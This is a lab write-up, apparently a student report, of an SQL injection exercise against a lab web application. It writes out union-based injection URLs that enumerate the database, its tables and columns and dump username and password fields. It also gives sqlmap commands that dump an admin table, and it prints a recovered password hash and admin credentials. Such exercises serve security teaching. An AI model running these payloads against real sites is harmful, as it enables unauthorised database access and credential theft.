当前位置:网站首页>SQL injection experiment
SQL injection experiment
2022-06-13 08:17:00 【BT youth】
The experiment purpose
Make students understand SQL Injection principle and utilization method
Experimental content
- Experimental target URL:http://10.110.2.145:8008/
- Get through manual injection admin Password of the account
- Screenshot of the experiment process , There must be payload And result screenshot
Screenshot of the experiment process
- SQL Manual injection
http://10.110.2.145:8008/article.php?id=1 and 1=1 # With echo
http://10.110.2.145:8008/article.php?id=1 and 1=2 # No echo
Order by Determine the number of fields
http://10.110.2.145:8008/article.php?id=1 order by 18 # With echo
http://10.110.2.145:8008/article.php?id=1 order by 19 # No echo
Get the current database :
http://10.110.2.145:8008/article.php?id=-1 union select 1,(database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
Get the table of the current database :
http://10.110.2.145:8008/article.php?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
obtain yzsoumember Table fields :
http://10.110.2.145:8008/article.php?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=’yzsoumember’),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
obtain yzsoumember Exterior and interior username,password Field contents :
http://10.110.2.145:8008/article.php?id=-1 union select 1,(select group_concat(username,password) from jian.yzsoumember),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
- SQLMAP Tool injection
sqlmap Scan website :sqlmap.py -u "http://10.110.2.145:8008/article.php?id=1"
List database names :sqlmap.py -u "http://10.110.2.145:8008/article.php?id=1" --dbs
find dede database :
List dede Table under database :
sqlmap.py -u "http://10.110.2.145:8008/article.php?id=1" -D dede -tables
find dede_admin surface
Show dede_admin Everything in the table
sqlmap.py -u "http://10.110.2.145:8008/article.php?id=1" -D dede -T dede_admin --dump
Pwd=f297a57a5a743894a0e4
account number admin、 password admin
边栏推荐
- [pytorch] pytorch0.4.0 installation tutorial and GPU configuration collection (including test code)
- SolidWorks修改工程图中文字字体的方法
- 微服务项目搭建三:自动生成代码
- 使用kvm创建三台能通局域网的虚拟机
- P7712 [Ynoi2077] hlcpq
- MySQL summary
- 微服务项目搭建二:数据库设计
- 获取类的属性
- Cosmos star application case
- Maternal and infant supplies wholesale industry uses management software to improve efficiency and realize cost reduction and efficiency increase
猜你喜欢
酒水批发行业应当如何高效管理商品与库存
Differences between Merkle DAG and Merkle tree
疫情之下的远程办公解决方案
Give code vitality -- the way to read code neatly
Founder of Starbucks: no longer open "public toilets" to non store consumers for safety reasons
Microservice project construction III: automatic code generation
Disk C is full? A few simple tips teach you to release and clean up tens of gigabytes of space on the C disk, the most effective way to clean up the C disk
How can the small and medium-sized lighting industry make use of the digital transformation to stand out from the encirclement?
汽配行业面临的难题用什么软件帮忙解决呢
Word中批注的使用方法
随机推荐
疫情之下的远程办公解决方案
Overall process analysis of account book operation in fabric0.6
AcWing 1977. 信息中继(基环树,并查集)
本地靶场2-文件上传漏洞(三)-网络安全
钉钉小程序 父子传参数对象 子组件页面不更新?
mysql面试题
Microservice Project Construction II: database design
Operation of simulated examination platform for examination question bank of G3 boiler water treatment operation certificate in 2022
Determine whether a string is rotated from another string
Structural analysis of hyperledger fabric (I)
[pytorch] pytorch0.4.0 installation tutorial and GPU configuration collection (including test code)
Local shooting range 2- file upload vulnerability (III) - Network Security
Practice makes sense -- your byte alignment and stack cognition may be wrong
5. fabric2.2 installation and submission contract (using official demo)
Amino encoding protocol
星巴克创始人:出于安全考量 或不再向非店内消费者开放“公厕”
Idea shortcut summary
中小型照明灯饰行业如何利用数字化转型突出重围?
免费文件服务器储存技术
Microservice project construction III: automatic code generation